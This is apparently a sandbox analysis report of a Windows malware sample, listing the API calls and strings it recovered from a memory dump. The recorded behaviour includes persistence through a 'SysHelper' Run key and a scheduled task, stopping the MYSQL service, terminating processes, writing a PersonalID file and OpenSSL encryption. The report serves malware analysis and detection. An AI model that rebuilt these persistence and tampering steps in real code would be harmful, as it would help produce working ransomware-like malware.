                • _free.LIBCMT ref: 0041BCD7
                  • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                  • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                  • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                  • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                  • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                  • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                • IsWindow.USER32(?), ref: 0041BF69
                • DestroyWindow.USER32(?), ref: 0041BF7B
                • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                • String ID:
                • API String ID: 3873257347-0
                • Opcode ID: 872b512db91234dd009610a63f2564f2aa606f2dd561917cc2f2326c6301647b
                • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                • Opcode Fuzzy Hash: 872b512db91234dd009610a63f2564f2aa606f2dd561917cc2f2326c6301647b
                • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
                APIs
                • DecodePointer.KERNEL32 ref: 00427B29
                • _free.LIBCMT ref: 00427B42
                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                • _free.LIBCMT ref: 00427B55
                • _free.LIBCMT ref: 00427B73
                • _free.LIBCMT ref: 00427B85
                • _free.LIBCMT ref: 00427B96
                • _free.LIBCMT ref: 00427BA1
                • _free.LIBCMT ref: 00427BC5
                • EncodePointer.KERNEL32(005C5208), ref: 00427BCC
                • _free.LIBCMT ref: 00427BE1
                • _free.LIBCMT ref: 00427BF7
                • _free.LIBCMT ref: 00427C1F
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                • String ID:
                • API String ID: 3064303923-0
                • Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                • Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
                • Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                • Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98
                APIs
                • CoInitialize.OLE32(00000000), ref: 00411BB0
                • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                • CoUninitialize.OLE32 ref: 00411BD0
                • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                • lstrcatW.KERNEL32(?), ref: 00411C44
                • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                • String ID: \shell32.dll
                • API String ID: 679253221-3783449302
                • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                APIs
                • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                • GetDesktopWindow.USER32 ref: 004549FB
                • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                • _wcsstr.LIBCMT ref: 00454A8A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                • String ID: Service-0x$_OPENSSL_isservice
                • API String ID: 2112994598-1672312481
                • Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                • Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                APIs
                • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                • __vfwprintf_p.LIBCMT ref: 00454B27
                  • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                • vswprintf.LIBCMT ref: 00454B5D
                • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                • String ID: OPENSSL$OpenSSL: FATAL
                • API String ID: 277090408-1348657634
                • Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                • Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                APIs
                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                • _memset.LIBCMT ref: 004123B6
                • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                • RegCloseKey.ADVAPI32(?), ref: 004123E7
                • GetCommandLineW.KERNEL32 ref: 004123F4
                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                • lstrcmpW.KERNEL32(?,?), ref: 00412422
                Strings
                • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                • SysHelper, xrefs: 004123D6
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                • API String ID: 122392481-4165002228
                • Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                • Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                • Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                APIs
                • CoInitialize.OLE32(00000000), ref: 0040DAEB
                • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
                • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                • _memset.LIBCMT ref: 0040DC38
                • CoUninitialize.OLE32 ref: 0040DC92
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                • String ID: --Task$Comment$Time Trigger Task
                • API String ID: 330603062-1376107329
                • Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                • Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                • Sleep.KERNEL32(?), ref: 00411A75
                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                • String ID: MYSQL
                • API String ID: 2359367111-1651825290
                • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                APIs
                • std::exception::exception.LIBCMT ref: 0044F27F
                  • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                • __CxxThrowException@8.LIBCMT ref: 0044F294
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                • std::exception::exception.LIBCMT ref: 0044F2AD
                • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                  • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                • std::exception::exception.LIBCMT ref: 0044F2FB
                • __CxxThrowException@8.LIBCMT ref: 0044F310
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                • String ID: bad function call
                • API String ID: 2464034642-3612616537
                • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                APIs
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$ErrorLast
                • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                • API String ID: 1717984340-2085858615
                • Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                • Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                • String ID:
                • API String ID: 790675137-0
                • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                APIs
                  • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                • _fgetws.LIBCMT ref: 0040C7BC
                • _memmove.LIBCMT ref: 0040C89F
                • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: CreateDirectory__wfsopen_fgetws_memmove
                • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                • API String ID: 2864494435-54166481
                • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                APIs
                • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                • CloseHandle.KERNEL32(00000000), ref: 004124B7
                • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                • CloseHandle.KERNEL32(00000000), ref: 004124CD
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                • String ID: cmd.exe
                • API String ID: 2696918072-723907552
                • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                APIs
                • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: SHGetFolderPathW$Shell32.dll$\
                • API String ID: 2574300362-2555811374
                • Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                • Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _malloc$__except_handler4_fprintf
                • String ID: &#160;$Error encrypting message: %s$\\n
                • API String ID: 1783060780-3771355929
                • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _strncmp
                • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                • API String ID: 909875538-2908105608
                • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                APIs
                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: CloseValue$OpenQuery
                • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                • API String ID: 3962714758-1667468722
                • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                APIs
                • _memset.LIBCMT ref: 0041E707
                  • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                • InternetOpenW.WININET ref: 0041E743
                • _wcsstr.LIBCMT ref: 0041E7AE
                • _memmove.LIBCMT ref: 0041E838
                • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                • _strstr.LIBCMT ref: 0041EA36
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                • DeleteFileA.KERNEL32(?), ref: 0041EA82
